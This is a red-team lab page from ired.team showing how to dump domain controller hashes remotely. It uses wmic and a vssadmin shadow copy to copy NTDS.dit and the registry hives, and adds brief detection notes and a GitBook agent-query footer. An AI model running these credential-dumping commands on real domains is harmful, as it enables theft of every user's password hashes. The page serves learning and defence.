> For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-domain-controller-hashes-via-wmic-and-shadow-copy-using-vssadmin.md). # Dumping Domain Controller Hashes via wmic and Vssadmin Shadow Copy This quick labs hows how to dump all user hashes from the DC by creating a shadow copy of the C drive using vssadmin - remotely. This lab assumes the attacker has already gained administratrative access to the domain controller. ## Execution Create a shadow copy of the C drive of the Domain Controller: {% code title="attacker\@victim" %} ```csharp wmic /node:dc01 /user:administrator@offense /password:123456 process call create "cmd /c vssadmin create shadow /for=C: 2>&1" ``` {% endcode %} ![](/files/-LfaP9JMv1K3AOzIQNBc) Copy the NTDS.dit, SYSTEM and SECURITY hives to C:\temp on the DC01: {% code title="attacker\@victim" %} ```csharp wmic /node:dc01 /user:administrator@offense /password:123456 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\" ``` {% endcode %} Below shows the above command executed on the attacking machine (right) and the files being dumped to c:\temp on the DC01 on the left: ![](/files/-Lfa_NvNdi0W11EARqKP) Mount the DC01\c$\temp locally in order to retrieve the dumped files: {% code title="attacker\@victim" %} ```csharp net use j: \\dc01\c$\temp /user:administrator 123456; dir j:\ ``` {% endcode %} ![](/files/-Lfa_lAev0lVzTL40dh-) Now, of you go extracting hashes with secretsdump as shown here: {% content-ref url="/pages/-LHwpaPZnf94MyLpTb2z" %} [Dumping Domain Controller Hashes Locally and Remotely](/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration.md) {% endcontent-ref %} ## Observations A quick note for defenders on the proces ancestry: ![](/files/-LfaPCUFMkVICWg5F4zc) and of course commandlines: ![](/files/-LfabW8Rhdez1VI3WLZt) as well as service states: ![](/files/-Lfaavm-6B3pUsOpbfYF) ...and of course the lateral movement piece: ![](/files/-LfahZYptQD0OS_inswZ) ## References --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-domain-controller-hashes-via-wmic-and-shadow-copy-using-vssadmin.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.